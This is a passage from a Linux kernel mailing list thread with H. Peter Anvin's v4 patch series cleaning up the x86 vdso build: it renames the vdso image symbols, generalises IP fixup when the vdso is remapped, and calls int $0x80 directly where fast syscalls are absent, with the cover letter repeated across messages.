arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of these files, so it is more consistent for
them to have a naming that more directly mirrors the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644d0cfe..8e829575e12f 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129d597b..eb60859dbcbf 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f5cb44..7f833026d5b2 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b2f907..8f98c2d7c7a9 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc96be7e..2ba5f166e58f 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef3205a..e8afbe9faa5b 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a004c60..08e72f429870 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42bd350..e55cf19e68fe 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:55 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack will also needed to be adjusted (as well as the
shadow stack, if enabled.) Fortunately this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d7c7a9..e7fd7517370f 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:58 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so suffer the 3-byte NOP if not
applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f16e511..9157cf9c5749 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+ * vdso symbol table (not the code) and entry point, but that
+ * would a fair bit of tooling work or by simply compiling
+ * two different vDSO images, but that doesn't seem worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c6dd57..5806b1cd6aef 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:04 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc did not allow %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful of more lines of code than it removes,
and in fact could be made substantially smaller by removing the macros
for the argument counts that aren't currently used, however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Biszjak)
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 ++---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7ee8f0f..3cf214cc4a75 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
